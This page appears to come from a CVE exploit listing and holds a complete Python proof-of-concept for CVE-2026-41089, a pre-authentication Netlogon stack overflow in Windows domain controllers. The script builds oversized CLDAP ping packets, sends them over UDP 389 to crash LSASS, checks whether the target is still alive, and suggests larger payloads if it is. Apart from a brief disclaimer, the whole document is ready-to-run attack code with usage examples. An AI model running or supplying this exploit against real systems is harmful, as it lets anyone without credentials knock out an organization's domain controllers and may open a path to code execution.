5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
# DISCLAIMER: This proof-of-concept is provided for educational and authorized
# security research purposes only. The author(s) accept no responsibility or
# liability for any misuse, damage, or loss caused by the use of this code.
# Use at your own risk.
"""
CVE-2026-41089 PoC - Netlogon Stack Buffer Overflow via CLDAP Ping
===================================================================
Sends a CLDAP (Connectionless LDAP over UDP 389) DC locator ping request
with an oversized username to trigger a stack buffer overflow in
netlogon!NetpLogonPutUnicodeString -> netlogon!BuildSamLogonResponse.

The vulnerable code path:
  I_NetLogonLdapLookupEx -> NlGetLocalPingResponse -> LogonRequestHandler
  -> BuildSamLogonResponse -> NetpLogonPutUnicodeString

NlGetLocalPingResponse allocates a 528-byte stack buffer (Src[528]) and
passes it to BuildSamLogonResponse. BuildSamLogonResponse calls
NetpLogonPutUnicodeString multiple times to write Unicode strings into
this buffer without bounds checking.

The root cause: the maximum string length passed to NetpLogonPutUnicodeString
was interpreted as bytes but treated as WCHARs, doubling the effective write.
The "User" field in the CLDAP filter is attacker-controlled (up to 130 wchars).
Combined with server name, domain name, GUIDs, and DNS names, the total write
exceeds 528 bytes and overflows the stack.

Target: Windows Server 2012 through 2025 Domain Controllers (pre-patch)
Impact: LSASS crash -> DC reboot (~60 seconds). RCE possible but not demonstrated.
Attack vector: UDP port 389 (CLDAP), pre-authentication, no credentials needed
CVE: CVE-2026-41089, CVSS 9.8 CRITICAL, CWE-121
Published: May 12, 2026 by Microsoft (found internally)
"""

import argparse
import socket
import struct
import sys
import time


# ---------------------------------------------------------------------------
# BER/DER encoding primitives
# ---------------------------------------------------------------------------

def encode_ber_length(length):
    """Encode a BER length field (X.690 8.1.3)."""
    if length < 0x80:
        return bytes([length])
    elif length < 0x100:
        return bytes([0x81, length])
    elif length < 0x10000:
        return bytes([0x82, (length >> 8) & 0xFF, length & 0xFF])
    else:
        return bytes([0x83, (length >> 16) & 0xFF, (length >> 8) & 0xFF, length & 0xFF])


def encode_ber_int(value):
    """Encode a BER INTEGER (tag 0x02)."""
    if value < 0:
        raise ValueError(f"Negative integers not supported: {value}")
    if value == 0:
        payload = b'\x00'
    elif value < 0x80:
        payload = bytes([value])
    elif value < 0x100:
        # Leading zero to avoid high-bit being read as sign (X.690 8.3.2)
        payload = bytes([0x00, value])
    elif value < 0x10000:
        payload = struct.pack('>H', value)
    else:
        payload = struct.pack('>I', value)
    return bytes([0x02]) + encode_ber_length(len(payload)) + payload


def encode_ber_enum(value):
    """Encode a BER ENUMERATED (tag 0x0a)."""
    if value < 0:
        raise ValueError(f"Negative enum not supported: {value}")
    if value == 0:
        payload = b'\x00'
    elif value < 0x80:
        payload = bytes([value])
    elif value < 0x100:
        payload = bytes([0x00, value])
    else:
        payload = struct.pack('>H', value)
    return bytes([0x0a]) + encode_ber_length(len(payload)) + payload


def encode_ber_string(tag, value):
    """Encode a tagged string (OCTET STRING, UTF8String, etc.)."""
    if isinstance(value, str):
        value = value.encode('utf-8')
    return bytes([tag]) + encode_ber_length(len(value)) + value


def encode_ber_sequence(tag, contents):
    """Encode a SEQUENCE/SET with a given tag."""
    return bytes([tag]) + encode_ber_length(len(contents)) + contents


# ---------------------------------------------------------------------------
# LDAP filter construction
# ---------------------------------------------------------------------------

def build_equality_filter(attr_name, attr_value):
    """Build an LDAP equalityMatch filter: (attr=value).
    Tag 0xA3 = context class, constructed, tag number 3.
    """
    attr_bytes = attr_name.encode('utf-8')
    if isinstance(attr_value, str):
        val_bytes = attr_value.encode('utf-8')
    else:
        val_bytes = attr_value

    content = encode_ber_string(0x04, attr_bytes) + encode_ber_string(0x04, val_bytes)
    return encode_ber_sequence(0xA3, content)


# ---------------------------------------------------------------------------
# CLDAP DC Locator Ping
# ---------------------------------------------------------------------------

def build_cldap_ping(target_domain, username, ntver=0x00000016):
    """Build a CLDAP DC locator ping (LDAP SearchRequest over UDP).

    Filter: (&(DnsDomain=<domain>)(User=<username>)(NtVer=<ntver>))

    Per MS-ADTS 6.3.3.2 / RFC 4511 Section 4.5.1.
    """
    # NtVer: 4-byte little-endian flag
    ntver_bytes = struct.pack('<I', ntver)

    # AND filter (context tag 0xA0)
    and_content = (
        build_equality_filter("DnsDomain", target_domain)
        + build_equality_filter("User", username)
        + build_equality_filter("NtVer", ntver_bytes)
    )
    and_filter = encode_ber_sequence(0xA0, and_content)

    # Requested attributes: ["Netlogon"]
    attributes = encode_ber_sequence(0x30, encode_ber_string(0x04, "Netlogon"))

    # SearchRequest fields (RFC 4511 Section 4.5.1, in order):
    base_dn    = encode_ber_string(0x04, "")       # baseObject
    scope      = encode_ber_enum(0)                 # baseObject
    deref      = encode_ber_enum(0)                 # neverDerefAliases
    size_limit = encode_ber_int(0)                  # no limit
    time_limit = encode_ber_int(0)                  # no limit
    types_only = bytes([0x01, 0x01, 0x00])          # BOOLEAN FALSE

    search_body = (
        base_dn + scope + deref + size_limit
        + time_limit + types_only + and_filter + attributes
    )

    # SearchRequest = APPLICATION 3 (tag 0x63)
    search_request = encode_ber_sequence(0x63, search_body)

    # LDAPMessage = SEQUENCE { messageID INTEGER, protocolOp SearchRequest }
    ldap_message = encode_ber_sequence(0x30, encode_ber_int(1) + search_request)

    return ldap_message


# ---------------------------------------------------------------------------
# Network I/O
# ---------------------------------------------------------------------------

def send_cldap_ping(target_ip, target_domain, username, port=389, timeout=5):
    """Send a CLDAP ping and wait for a response.

    Returns the raw response bytes, or None on timeout/error.
    """
    packet = build_cldap_ping(target_domain, username)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)

    try:
        sock.sendto(packet, (target_ip, port))
        try:
            data, addr = sock.recvfrom(4096)
            return data
        except socket.timeout:
            return None
    except OSError as e:
        print(f"[-] Socket error: {e}", file=sys.stderr)
        return None
    finally:
        sock.close()


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-41089 PoC - Netlogon CLDAP stack buffer overflow",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""\
examples:
  %(prog)s 10.0.50.21 corp.local              Normal ping (connectivity test)
  %(prog)s 10.0.50.21 corp.local -l 130       Overflow attempt (default)
  %(prog)s 10.0.50.21 corp.local -l 200       Larger overflow
  %(prog)s 10.0.50.21 corp.local -l 130 -t 10 Longer timeout for slow networks
""",
    )
    parser.add_argument("target_ip", help="IP address of the Domain Controller")
    parser.add_argument("domain_name", help="DNS domain name (e.g. corp.local)")
    parser.add_argument(
        "-l", "--length", type=int, default=130,
        help="Username length in characters (default: 130)",
    )
    parser.add_argument(
        "-t", "--timeout", type=int, default=5,
        help="UDP recv timeout in seconds (default: 5)",
    )
    parser.add_argument(
        "-d", "--delay", type=int, default=3,
        help="Seconds to wait between phase 2 and phase 3 (default: 3)",
    )
    parser.add_argument(
        "-p", "--port", type=int, default=389,
        help="CLDAP port (default: 389)",
    )
    args = parser.parse_args()

    if args.length < 1:
        print("[-] Username length must be >= 1", file=sys.stderr)
        sys.exit(1)

    username = "A" * args.length

    print("=" * 60)
    print("CVE-2026-41089 - Netlogon Stack Buffer Overflow PoC")
    print("=" * 60)
    print()
    print(f"  Target:   {args.target_ip}:{args.port}")
    print(f"  Domain:   {args.domain_name}")
    print(f"  Username: {args.length} chars ({args.length * 2} bytes as UTF-16)")
    print(f"  Timeout:  {args.timeout}s")
    print()

    # Phase 1: connectivity check
    print("[1/3] Sending normal CLDAP ping (short username)...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        print("[-] No response. DC is not reachable on UDP 389.")
        print("    Verify the target is a domain controller and the port is open.")
        sys.exit(1)
    print(f"[+] DC responded ({len(resp)} bytes). Target is alive.")
    print()

    # Phase 2: send overflow
    print(f"[2/3] Sending overflow payload (username={args.length} chars)...")
    try:
        resp = send_cldap_ping(
            args.target_ip, args.domain_name, username,
            port=args.port, timeout=args.timeout,
        )
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        sys.exit(130)

    if resp is None:
        print("[!] No response. LSASS may have crashed.")
    else:
        print(f"[+] Got response ({len(resp)} bytes). Target processed the packet.")

    # Give LSASS time to crash before the liveness check
    print(f"    Waiting {args.delay}s before liveness check...")
    try:
        time.sleep(args.delay)
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        sys.exit(130)
    print()

    # Phase 3: liveness check
    print("[3/3] Liveness check...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        print("[!] DC is not responding. LSASS likely crashed. Expect reboot in ~60s.")
    else:
        print(f"[+] DC responded ({len(resp)} bytes). Still alive.")
        if args.length < 200:
            print(f"    Try a larger payload: -l {min(args.length + 50, 500)}")


if __name__ == "__main__":
    main()